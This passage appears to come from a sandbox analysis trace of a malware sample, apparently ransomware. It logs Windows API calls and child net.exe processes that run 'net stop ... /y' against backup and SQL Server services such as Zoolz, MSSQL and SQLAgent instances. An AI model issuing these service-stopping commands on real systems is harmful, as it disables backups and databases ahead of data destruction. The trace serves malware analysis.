_String2="CASAD2DWebSvc") returned 15 [0126.239] _wcsicmp (_String1="rdr", _String2="CASAD2DWebSvc") returned 15 [0126.239] _wcsicmp (_String1="workstation", _String2="CASAD2DWebSvc") returned 20 [0126.239] _wcsicmp (_String1="work", _String2="CASAD2DWebSvc") returned 20 [0126.239] _wcsicmp (_String1="wksta", _String2="CASAD2DWebSvc") returned 20 [0126.239] _wcsicmp (_String1="prdr", _String2="CASAD2DWebSvc") returned 13 [0126.239] _wcsicmp (_String1="devrdr", _String2="CASAD2DWebSvc") returned 1 [0126.239] _wcsicmp (_String1="lanmanworkstation", _String2="CASAD2DWebSvc") returned 9 [0126.239] _wcsicmp (_String1="server", _String2="CASAD2DWebSvc") returned 16 [0126.239] _wcsicmp (_String1="svr", _String2="CASAD2DWebSvc") returned 16 [0126.239] _wcsicmp (_String1="srv", _String2="CASAD2DWebSvc") returned 16 [0126.239] _wcsicmp (_String1="lanmanserver", _String2="CASAD2DWebSvc") returned 9 [0126.239] _wcsicmp (_String1="alerter", _String2="CASAD2DWebSvc") returned -2 [0126.239] _wcsicmp (_String1="netlogon", _String2="CASAD2DWebSvc") returned 11 [0126.239] _wcsupr (in: _String="CASAD2DWebSvc" | out: _String="CASAD2DWEBSVC") returned="CASAD2DWEBSVC" [0126.239] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4254b0 [0126.660] GetServiceKeyNameW (in: hSCManager=0x4254b0, lpDisplayName="CASAD2DWEBSVC", lpServiceName=0xe5aaf0, lpcchBuffer=0xcfa58 | out: lpServiceName="", lpcchBuffer=0xcfa58) returned 0 [0126.661] _wcsicmp (_String1="msg", _String2="CASAD2DWEBSVC") returned 10 [0126.661] _wcsicmp (_String1="messenger", _String2="CASAD2DWEBSVC") returned 10 [0126.661] _wcsicmp (_String1="receiver", _String2="CASAD2DWEBSVC") returned 15 [0126.661] _wcsicmp (_String1="rcv", _String2="CASAD2DWEBSVC") returned 15 [0126.661] _wcsicmp (_String1="redirector", _String2="CASAD2DWEBSVC") returned 15 [0126.661] _wcsicmp (_String1="redir", _String2="CASAD2DWEBSVC") returned 15 [0126.661] _wcsicmp (_String1="rdr", _String2="CASAD2DWEBSVC") returned 15 [0126.661] _wcsicmp (_String1="workstation", _String2="CASAD2DWEBSVC") returned 20 [0126.661] _wcsicmp (_String1="work", _String2="CASAD2DWEBSVC") returned 20 [0126.661] _wcsicmp (_String1="wksta", _String2="CASAD2DWEBSVC") returned 20 [0126.661] _wcsicmp (_String1="prdr", _String2="CASAD2DWEBSVC") returned 13 [0126.661] _wcsicmp (_String1="devrdr", _String2="CASAD2DWEBSVC") returned 1 [0126.661] _wcsicmp (_String1="lanmanworkstation", _String2="CASAD2DWEBSVC") returned 9 [0126.661] _wcsicmp (_String1="server", _String2="CASAD2DWEBSVC") returned 16 [0126.661] _wcsicmp (_String1="svr", _String2="CASAD2DWEBSVC") returned 16 [0126.661] _wcsicmp (_String1="srv", _String2="CASAD2DWEBSVC") returned 16 [0126.661] _wcsicmp (_String1="lanmanserver", _String2="CASAD2DWEBSVC") returned 9 [0126.661] _wcsicmp (_String1="alerter", _String2="CASAD2DWEBSVC") returned -2 [0126.662] _wcsicmp (_String1="netlogon", _String2="CASAD2DWEBSVC") returned 11 [0126.662] NetServiceControl (in: servername=0x0, service="CASAD2DWEBSVC", opcode=0x0, arg=0x0, bufptr=0xcfa54 | out: bufptr=0xcfa54) returned 0x889 [0126.663] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.663] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.663] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.665] GetFileType (hFile=0x0) returned 0x0 [0126.665] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x423ed0 [0126.665] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x423ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.665] WriteFile (in: hFile=0x0, lpBuffer=0x423ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xcf994, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf994, lpOverlapped=0x0) returned 0 [0126.665] LocalFree (hMem=0x423ed0) returned 0x0 [0126.665] GetFileType (hFile=0x0) returned 0x0 [0126.665] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426178 [0126.665] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0126.665] WriteFile (in: hFile=0x0, lpBuffer=0x426178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf994, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf994, lpOverlapped=0x0) returned 0 [0126.665] LocalFree (hMem=0x426178) returned 0x0 [0126.665] _ultow (in: _Dest=0x889, _Radix=850372 | out: _Dest=0x889) returned="2185" [0126.665] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.665] GetFileType (hFile=0x0) returned 0x0 [0126.665] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x426178 [0126.665] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x426178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.665] WriteFile (in: hFile=0x0, lpBuffer=0x426178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xcf9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf9a0, lpOverlapped=0x0) returned 0 [0126.665] LocalFree (hMem=0x426178) returned 0x0 [0126.665] GetFileType (hFile=0x0) returned 0x0 [0126.665] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426178 [0126.665] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0126.666] WriteFile (in: hFile=0x0, lpBuffer=0x426178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf9a0, lpOverlapped=0x0) returned 0 [0126.666] LocalFree (hMem=0x426178) returned 0x0 [0126.666] NetApiBufferFree (Buffer=0x421ae8) returned 0x0 [0126.666] NetApiBufferFree (Buffer=0x421b00) returned 0x0 [0126.666] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop CASAD2DWebSvc /y" [0126.666] exit (_Code=2) Process: id = "298" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4ee3f000" os_pid = "0x11a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "110" os_parent_pid = "0x628" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 704 os_tid = 0x1240 [0126.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffb64 | out: lpSystemTimeAsFileTime=0x2ffb64*(dwLowDateTime=0x1f0581b0, dwHighDateTime=0x1d6f0d1)) [0126.302] GetCurrentProcessId () returned 0x11a8 [0126.302] GetCurrentThreadId () returned 0x1240 [0126.302] GetTickCount () returned 0x1152d0a [0126.302] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffb5c | out: lpPerformanceCount=0x2ffb5c*=24540317281) returned 1 [0126.303] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.303] __set_app_type (_Type=0x1) [0126.303] __p__fmode () returned 0x770331f4 [0126.303] __p__commode () returned 0x770331fc [0126.303] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.303] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.303] GetConsoleOutputCP () returned 0x1b5 [0126.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.303] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.307] sprintf_s (in: _DstBuf=0x2ffb1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.307] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0126.309] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.309] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" [0126.309] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff8e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.309] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x6c) returned 0x3e3ae0 [0126.309] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.309] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffaec | out: Buffer=0x2ffaec*=0x3e1ae8) returned 0x0 [0126.309] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffaec | out: Buffer=0x2ffaec*=0x3e1b00) returned 0x0 [0126.309] _fileno (_File=0x77032900) returned -2 [0126.310] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.310] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.310] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.310] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.310] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.310] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.310] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.310] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.310] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.310] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.310] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.310] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.310] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.310] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.310] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.310] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.310] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.310] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.310] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.310] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.310] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.310] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.310] _wcsicmp (_String1="accounts", _String2="MSSQL$TPSAMA") returned -12 [0126.310] _wcsicmp (_String1="computer", _String2="MSSQL$TPSAMA") returned -10 [0126.310] _wcsicmp (_String1="config", _String2="MSSQL$TPSAMA") returned -10 [0126.310] _wcsicmp (_String1="continue", _String2="MSSQL$TPSAMA") returned -10 [0126.310] _wcsicmp (_String1="cont", _String2="MSSQL$TPSAMA") returned -10 [0126.310] _wcsicmp (_String1="file", _String2="MSSQL$TPSAMA") returned -7 [0126.310] _wcsicmp (_String1="files", _String2="MSSQL$TPSAMA") returned -7 [0126.310] _wcsicmp (_String1="group", _String2="MSSQL$TPSAMA") returned -6 [0126.310] _wcsicmp (_String1="groups", _String2="MSSQL$TPSAMA") returned -6 [0126.311] _wcsicmp (_String1="help", _String2="MSSQL$TPSAMA") returned -5 [0126.311] _wcsicmp (_String1="helpmsg", _String2="MSSQL$TPSAMA") returned -5 [0126.311] _wcsicmp (_String1="localgroup", _String2="MSSQL$TPSAMA") returned -1 [0126.311] _wcsicmp (_String1="pause", _String2="MSSQL$TPSAMA") returned 3 [0126.311] _wcsicmp (_String1="session", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="sessions", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="sess", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="share", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="start", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="stats", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="statistics", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="stop", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="time", _String2="MSSQL$TPSAMA") returned 7 [0126.311] _wcsicmp (_String1="user", _String2="MSSQL$TPSAMA") returned 8 [0126.311] _wcsicmp (_String1="users", _String2="MSSQL$TPSAMA") returned 8 [0126.311] _wcsicmp (_String1="msg", _String2="MSSQL$TPSAMA") returned -12 [0126.311] _wcsicmp (_String1="messenger", _String2="MSSQL$TPSAMA") returned -14 [0126.311] _wcsicmp (_String1="receiver", _String2="MSSQL$TPSAMA") returned 5 [0126.311] _wcsicmp (_String1="rcv", _String2="MSSQL$TPSAMA") returned 5 [0126.311] _wcsicmp (_String1="netpopup", _String2="MSSQL$TPSAMA") returned 1 [0126.311] _wcsicmp (_String1="redirector", _String2="MSSQL$TPSAMA") returned 5 [0126.311] _wcsicmp (_String1="redir", _String2="MSSQL$TPSAMA") returned 5 [0126.311] _wcsicmp (_String1="rdr", _String2="MSSQL$TPSAMA") returned 5 [0126.311] _wcsicmp (_String1="workstation", _String2="MSSQL$TPSAMA") returned 10 [0126.311] _wcsicmp (_String1="work", _String2="MSSQL$TPSAMA") returned 10 [0126.311] _wcsicmp (_String1="wksta", _String2="MSSQL$TPSAMA") returned 10 [0126.311] _wcsicmp (_String1="prdr", _String2="MSSQL$TPSAMA") returned 3 [0126.311] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPSAMA") returned -9 [0126.311] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPSAMA") returned -1 [0126.311] _wcsicmp (_String1="server", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="svr", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="srv", _String2="MSSQL$TPSAMA") returned 6 [0126.311] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPSAMA") returned -1 [0126.311] _wcsicmp (_String1="alerter", _String2="MSSQL$TPSAMA") returned -12 [0126.311] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPSAMA") returned 1 [0126.312] _wcsupr (in: _String="MSSQL$TPSAMA" | out: _String="MSSQL$TPSAMA") returned="MSSQL$TPSAMA" [0126.312] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3e54b0 [0126.679] GetServiceKeyNameW (in: hSCManager=0x3e54b0, lpDisplayName="MSSQL$TPSAMA", lpServiceName=0xe5aaf0, lpcchBuffer=0x2ffa88 | out: lpServiceName="", lpcchBuffer=0x2ffa88) returned 0 [0126.680] _wcsicmp (_String1="msg", _String2="MSSQL$TPSAMA") returned -12 [0126.680] _wcsicmp (_String1="messenger", _String2="MSSQL$TPSAMA") returned -14 [0126.680] _wcsicmp (_String1="receiver", _String2="MSSQL$TPSAMA") returned 5 [0126.680] _wcsicmp (_String1="rcv", _String2="MSSQL$TPSAMA") returned 5 [0126.680] _wcsicmp (_String1="redirector", _String2="MSSQL$TPSAMA") returned 5 [0126.680] _wcsicmp (_String1="redir", _String2="MSSQL$TPSAMA") returned 5 [0126.680] _wcsicmp (_String1="rdr", _String2="MSSQL$TPSAMA") returned 5 [0126.680] _wcsicmp (_String1="workstation", _String2="MSSQL$TPSAMA") returned 10 [0126.680] _wcsicmp (_String1="work", _String2="MSSQL$TPSAMA") returned 10 [0126.680] _wcsicmp (_String1="wksta", _String2="MSSQL$TPSAMA") returned 10 [0126.680] _wcsicmp (_String1="prdr", _String2="MSSQL$TPSAMA") returned 3 [0126.680] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPSAMA") returned -9 [0126.680] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPSAMA") returned -1 [0126.680] _wcsicmp (_String1="server", _String2="MSSQL$TPSAMA") returned 6 [0126.680] _wcsicmp (_String1="svr", _String2="MSSQL$TPSAMA") returned 6 [0126.680] _wcsicmp (_String1="srv", _String2="MSSQL$TPSAMA") returned 6 [0126.680] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPSAMA") returned -1 [0126.680] _wcsicmp (_String1="alerter", _String2="MSSQL$TPSAMA") returned -12 [0126.680] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPSAMA") returned 1 [0126.680] NetServiceControl (in: servername=0x0, service="MSSQL$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x2ffa84 | out: bufptr=0x2ffa84) returned 0x889 [0126.682] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.682] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.682] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.683] GetFileType (hFile=0x0) returned 0x0 [0126.683] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3e3ed0 [0126.683] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3e3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.683] WriteFile (in: hFile=0x0, lpBuffer=0x3e3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ff9c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff9c4, lpOverlapped=0x0) returned 0 [0126.683] LocalFree (hMem=0x3e3ed0) returned 0x0 [0126.684] GetFileType (hFile=0x0) returned 0x0 [0126.684] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e6178 [0126.684] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0126.684] WriteFile (in: hFile=0x0, lpBuffer=0x3e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff9c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff9c4, lpOverlapped=0x0) returned 0 [0126.684] LocalFree (hMem=0x3e6178) returned 0x0 [0126.684] _ultow (in: _Dest=0x889, _Radix=3144180 | out: _Dest=0x889) returned="2185" [0126.684] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.684] GetFileType (hFile=0x0) returned 0x0 [0126.684] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3e6178 [0126.684] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3e6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.684] WriteFile (in: hFile=0x0, lpBuffer=0x3e6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ff9d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff9d0, lpOverlapped=0x0) returned 0 [0126.684] LocalFree (hMem=0x3e6178) returned 0x0 [0126.684] GetFileType (hFile=0x0) returned 0x0 [0126.684] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e6178 [0126.684] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0126.684] WriteFile (in: hFile=0x0, lpBuffer=0x3e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff9d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff9d0, lpOverlapped=0x0) returned 0 [0126.684] LocalFree (hMem=0x3e6178) returned 0x0 [0126.685] NetApiBufferFree (Buffer=0x3e1ae8) returned 0x0 [0126.685] NetApiBufferFree (Buffer=0x3e1b00) returned 0x0 [0126.685] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" [0126.685] exit (_Code=2) Process: id = "299" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a29c000" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Zoolz 2 Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 705 os_tid = 0xc8c Process: id = "300" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5c3a1000" os_pid = "0xdc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 706 os_tid = 0xcc0 Process: id = "301" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x605a6000" os_pid = "0xdc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 707 os_tid = 0x624 Process: id = "302" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5aaab000" os_pid = "0xeb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 708 os_tid = 0x964 Process: id = "303" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4f5b0000" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 709 os_tid = 0x90 Process: id = "304" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4f3b5000" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop swi_service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 710 os_tid = 0x9b4 Process: id = "305" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x630ba000" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$TPSAMA /y" cur_dir = 